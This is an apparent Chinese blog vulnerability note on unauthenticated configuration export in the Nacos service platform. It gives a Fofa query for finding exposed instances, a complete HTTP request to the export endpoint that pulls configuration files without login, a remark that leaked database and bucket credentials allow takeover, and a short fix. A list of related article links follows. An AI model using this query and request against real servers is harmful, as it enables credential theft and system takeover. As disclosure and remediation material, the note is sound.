Nacos未授权下载配置信息

0x01 漏洞描述:

Nacos是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。Nacos存在未授权文件下载,攻击者在不登录情况下可未授权下载系统配置文件。

攻击者利用该漏洞可未授权获取到系统配置文件,如数据库和Redis连接地址,登录账号和密码等。

0x02 搜索语句:

Fofa:icon_hash="13942501" || title="nacos"

0x03 漏洞复现:

复制代码
GET /v1/cs/configs?export=true&group=&tenant=&appName=&ids=&dataId= HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Connection: keep-alive

域名拼接接口访问后

配置文件中泄漏数据库配置、存储桶配置,可实现接管

0x04 修复建议:

对未授权访问页面做session认证,严格审核后台功能页面的访问权限,若为未登录用户则拒绝访问。

相关推荐
Joker时代14 分钟前
重塑Web3安全防线:Vkey验证器正式登陆安卓与iOS平台,开启数字资产防护新纪元
安全·web3
科技发布20 分钟前
有没有安全正规的广告交易平台?推荐传播易APP
安全
JL1544 分钟前
Agent工程-为什么Agent必须有观测和Tracing
服务器·网络·人工智能·安全
GoFly开发者3 小时前
Go语言开发框架GoFlyGen新增 网站安全助手 插件,帮助开发者提供应用安全防护,保障平台系统数据安全。
网络·安全
笺落彼岸3 小时前
SpringBoot3 JDK17集成proguard实现混淆打包
安全·https
甄同学3 小时前
第十七篇:Bash Executor命令执行器,安全运行Shell命令
开发语言·安全·bash
h3guang Official4 小时前
K8s安全实战:从漏洞靶场到红蓝对抗
安全·容器·kubernetes
星释5 小时前
鸿蒙智能体开发实战:29.智能体安全与成本优化
服务器·安全·华为·harmonyos·鸿蒙·智能体
数据知道6 小时前
DNS 安全攻防:缓存投毒、DNS 隧道与检测实战
安全·网络安全·缓存·缓存投毒
humors2216 小时前
【转帖】关于防范AI编程工具Claude Code安全后门隐患的风险提示
网络·安全·ai编程